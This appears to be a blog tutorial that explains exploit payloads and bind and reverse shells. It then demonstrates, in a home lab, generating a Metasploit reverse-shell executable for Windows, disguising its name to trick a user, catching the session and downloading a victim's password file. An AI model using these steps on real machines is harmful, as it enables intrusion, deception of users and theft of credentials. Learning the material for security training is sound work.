In layman terms, exploit is a security attack on a vulnerability. They have potential for a large scale of damage such as install system malware or gain system access or recruit client machines into an existing botnet.
This is accomplished with the help of a payload. The payload is a sequence of code that is executed when the vulnerability is triggered. To make things clear, an Exploit is really broken up into two parts, like so:
EXPLOIT = Vulnerability + Payload
The payload is usually written in Assembly Language
Platform and OS dependent.That is a Win32 payload will not work in Linux (even if we are exploiting the same bug)
Different payload types exist and they accomplish different tasks such as:
- exec: Execute a command or program on the remote system
- download_exec: Download a file from a URL and execute
- upload_exec: Upload a local file and execute
- adduser: Add user to system accounts
Payloads come in many different flavors and can range from a few lines of code to small applications such as the Meterpreter shell. One should not just automatically jump to the Meterpreter shell. Metasploit contains over 200 different payloads.
However, the most common payload type used with exploits are shellcodes or aka shell payloads.These payloads are very useful because they provide the attacker an interactive shell that can be used to completely control the system remotely
There are two different types of shell payloads:
Bind Shells: A socket is created, a port is bound to it and when an a connection is established to it, it will spawn a shell. The shell lays dormant while awaiting instructions from an attacker.
Reverse Shells: Instead of creating a listening socket, a connection is created to a predefined IP and Port and a shell is then shoveled to the Attacker.
he Meterpreter (short for meta-interpreter) shell, a special type of shell, is the bread and butter of Metasploit. The Meterpreter shell can be added as a payload that is either a bind shell or reverse shell. The Meterpreter is one of the advanced payloads available with the MSF, but you should not look at it as just a payload; rather, view it as an exploit platform that is executed on the remote system. The Meterpreter has its own command shell, which provides the attacker with a wide variety of activities that can be executed on the exploited system.
Additionally, the Meterpreter allows developers to write their own extensions, in the form of DLL files, which can be uploaded and executed on the remote system. Thus, any programming language in which programs can be compiled into DLLs can be used to develop Meterpreter extensions.
However, the real beauty of the Meterpreter is that it runs by injecting itself into the vulnerable running process on the remote system, once exploitation occurs. All commands run through Meterpreter and also execute within the context of the running process. In this manner, it is able to avoid detection by anti-virus systems or basic forensic examinations.
In this blog demo, we are going to try and generate a payload in order to get control of a client Windows machine. I will try to keep this as concise as possible. Let’s get started!
On your Kali virtual machine, go to Exploitation Tools—> MSFvenom Payload Creator
To create a payload, we simply need to state the target type and where to listen. In this case the target is a Windows machine and We will be listening to the Ethernet interface.
Type the following command in terminal: /usr/bin/msfpc windows eth0
Hit enter and a custom payload will be generated which has attacker IP and port number details. The name of the payload need not remain the auto generated name and can be changed to any convenient name that will fool the user to run the .exe file that has been created.
Next we need to start the listener by running the MSF handler file which is the command : msfconsole -q -r ‘/root/filename.rc’
The listener will start up and wait for the Windows machine to execute the .exe file.
For demo purposes, I have already loaded the .exe file on windows machine and will now execute it by double click.
Note: The victim and host machines should be on the same LAN network.
As soon as .exe file is run, a session is initiated at the attacker machine. We need to enter the session ID by typing the command: sessions -i 1
With this, the two computers can talk back and forth and the Windows machine can be controlled through this terminal.
In image below: pwd command displays the current directory for my Windows machine
dir command displays all the disrectories with their permissions.
Thus an attacker can search for sensitive information on a victim PC remotely.
For instance, in above image one of the directories is named Passwords and may contain passwords saved in a simple text file. The files can be downloaded on your Kali machine by one simple command: download ‘file1.txt’
Similarly an attacker can edit or upload files to the client machine.
This concludes a basic Metasploit demo where we generated a payload and exploited a victim Windows machine. It is evident that Metasploit provides efficient and easy-to-use tools for exploitation. It is an industry favourite as it lets developers can write their own extensions and is able to avoid detection by anti-virus systems.